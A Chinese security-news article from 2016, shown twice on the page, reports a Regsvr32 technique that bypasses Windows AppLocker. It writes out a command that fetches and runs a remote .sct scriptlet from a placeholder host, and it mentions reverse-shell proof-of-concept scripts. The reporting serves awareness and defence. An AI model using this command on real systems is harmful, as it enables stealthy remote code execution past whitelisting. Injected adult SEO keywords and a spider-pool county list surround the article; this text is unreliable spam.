精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

當前位置:安全企業動態 → 正文

Windows AppLocker被繞過:攻擊者可不提權聯網注入DLL

責任編輯:editor006 |來源:企業網D1Net  2016-04-22 16:21:48 本文摘自:cnBeta.COM

AppLocker是Windows 7和Windows Server 2008 R2中引入的一項安全功能,旨在幫助管理員們指定哪個用戶或用戶組能夠訪問/運行某一個文件。然而據外媒報道,已經有人找到了利用Windows系統中Regsvr32命令行工具的某個隱藏特性,來繞過Windows AppLocker安全措施并正常注冊動態鏈接庫(DLLs)的方法。

Regsvr32則是一款可被安裝工具(或批處理腳本)使用,以便快速注冊動態鏈接庫的腳本工具。

照理說,微軟既然把這款“中性”而又危險的工具留在系統中,就應該管好它不被管理員之外的人所濫用。但遺憾的是,我們幾乎不可能檢測到這種類型的攻擊。

據安全研究人員Casey Smith所述,當攻擊者在某臺受感染的工作站上立足之后,就可以濫用Regsvr32、通過網絡下載一個COM腳本程序(.sct文件),然后在本地機器上注冊一個DLL。

更糟糕的是,攻擊者甚至無需取得管理員權限。Regsvr32可借助代理和TLS連接、重定向等功能,并且它擁有微軟自家的證書,所以可以執行任何看似正常的背景活動命令。

下面是標準的Regsvr32參數、以及而已命令的對比:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith還指出,“regsvr32能夠接收的腳本網址沒有很好的記錄,要觸發這一‘旁路’,可以把內置VB和JS元素的代碼塊放進去”。

在進一步的測試中,研究人員還在GitHub上放出了系統管理員能夠下載的“概念驗證腳本”(通過Regsvr32并打開一個后門、或者基于HTTP的反向shell)。

從理論上來說,這種類型的“漏洞”允許攻擊者訪問注冊所有DLL,然后在被感染的計算機上執行惡意代碼,更別說管理員權限了。

關鍵字:DLL攻擊者JSGitHub

本文摘自:cnBeta.COM

x Windows AppLocker被繞過:攻擊者可不提權聯網注入DLL 掃一掃
分享本文到朋友圈
當前位置:安全企業動態 → 正文

Windows AppLocker被繞過:攻擊者可不提權聯網注入DLL

責任編輯:editor006 |來源:企業網D1Net  2016-04-22 16:21:48 本文摘自:cnBeta.COM

AppLocker是Windows 7和Windows Server 2008 R2中引入的一項安全功能,旨在幫助管理員們指定哪個用戶或用戶組能夠訪問/運行某一個文件。然而據外媒報道,已經有人找到了利用Windows系統中Regsvr32命令行工具的某個隱藏特性,來繞過Windows AppLocker安全措施并正常注冊動態鏈接庫(DLLs)的方法。

Regsvr32則是一款可被安裝工具(或批處理腳本)使用,以便快速注冊動態鏈接庫的腳本工具。

照理說,微軟既然把這款“中性”而又危險的工具留在系統中,就應該管好它不被管理員之外的人所濫用。但遺憾的是,我們幾乎不可能檢測到這種類型的攻擊。

據安全研究人員Casey Smith所述,當攻擊者在某臺受感染的工作站上立足之后,就可以濫用Regsvr32、通過網絡下載一個COM腳本程序(.sct文件),然后在本地機器上注冊一個DLL。

更糟糕的是,攻擊者甚至無需取得管理員權限。Regsvr32可借助代理和TLS連接、重定向等功能,并且它擁有微軟自家的證書,所以可以執行任何看似正常的背景活動命令。

下面是標準的Regsvr32參數、以及而已命令的對比:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith還指出,“regsvr32能夠接收的腳本網址沒有很好的記錄,要觸發這一‘旁路’,可以把內置VB和JS元素的代碼塊放進去”。

在進一步的測試中,研究人員還在GitHub上放出了系統管理員能夠下載的“概念驗證腳本”(通過Regsvr32并打開一個后門、或者基于HTTP的反向shell)。

從理論上來說,這種類型的“漏洞”允許攻擊者訪問注冊所有DLL,然后在被感染的計算機上執行惡意代碼,更別說管理員權限了。

關鍵字:DLL攻擊者JSGitHub

本文摘自:cnBeta.COM

電子周刊
回到頂部

關于我們聯系我們版權聲明隱私條款廣告服務友情鏈接投稿中心招賢納士

企業網版權所有 ©2010-2024 京ICP備09108050號-6 京公網安備 11010502049343號

^
  • <menuitem id="jw4sk"></menuitem>

    1. <form id="jw4sk"><tbody id="jw4sk"><dfn id="jw4sk"></dfn></tbody></form>
      主站蜘蛛池模板: 沧源| 昌乐县| 乳山市| 吉木乃县| 浦北县| 绍兴县| 西林县| 子洲县| 渭源县| 武山县| 苏尼特右旗| 九龙城区| 安康市| 江永县| 南丹县| 灵武市| 营山县| 上蔡县| 忻城县| 莱阳市| 六枝特区| 莱阳市| 武汉市| 伊宁市| 松桃| 垣曲县| 华安县| 剑河县| 永和县| 阜阳市| 无为县| 石狮市| 怀宁县| 柳林县| 淮南市| 子长县| 太仓市| 米易县| 河间市| 沂南县| 大关县|